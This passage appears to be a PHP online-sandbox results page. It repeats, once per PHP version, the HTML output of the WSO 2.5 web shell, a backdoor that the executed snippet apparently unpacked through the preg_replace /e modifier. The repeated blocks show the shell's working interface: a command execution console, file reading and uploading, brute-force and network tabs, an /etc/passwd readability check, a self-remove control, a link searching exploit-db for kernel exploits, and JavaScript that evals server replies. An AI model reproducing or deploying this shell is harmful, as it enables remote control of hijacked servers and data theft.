(req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.6.12 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.6.11
Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /in/a60Yl on line 2 <html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.6.11 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.6.10
Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /in/a60Yl on line 2 <html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.6.10 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.6.9
Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /in/a60Yl on line 2 <html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.6.9 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.6.8
Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /in/a60Yl on line 2 <html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody 